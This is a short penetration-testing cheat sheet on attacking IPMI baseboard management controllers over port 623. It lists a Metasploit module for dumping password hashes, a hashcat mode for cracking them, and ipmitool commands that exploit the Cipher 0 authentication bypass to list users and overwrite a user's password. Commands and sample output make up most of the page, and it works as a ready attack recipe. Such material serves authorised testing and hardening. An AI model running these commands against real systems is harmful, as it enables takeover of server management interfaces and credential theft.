IPMI

Port: 623
Protocol: udp/tcp

Table of content

Dump hash
Cipher 0
Set password
Ressources

Dump hash

A flaw in the IPMI implementation allows the retrieval of users hashes

# MSF
use auxiliary/scanner/ipmi/ipmi_dumphashes

# Nmap
https://github.com/cldrn/external-nse-script-library/blob/master/ipmi-dump-hashes.nse

The hashes can be cracked using hashcat or john

hashcat -m 7300

Cipher 0

IPMI2.0 is vulnerable to an authentication bypass when the Cipher 0 option is used. However, a valid username is needed for the exploitation.

apt-get install ipmitool
ipmitool -I lanplus -C 0 -H ${ip} -U ${user} -P ${randomString} user list

# ID  Name      Callin  Link Auth   IPMI Msg   Channel Priv Limit
# 2   root             true    true       true       ADMINISTRATOR
# 3   Oper1            true    true       true       ADMINISTRATOR

Set password

# Using Cipher0 vulnerability
ipmitool -I lanplus -C 0 -H ${ip} -U ${user} -P ${randomString} user set password ${userId} abc123

# Otherwise
ipmitool -I lanplus -H ${ip} -U ${user} -P ${randomString} user set password ${userId} abc123

The ${userId} is the one retrieved with the user list command.

Ressources

Exploit IPMI : https://book.hacktricks.xyz/pentesting/623-udp-ipmi

results matching ""

No results matching ""

results matching ""

No results matching ""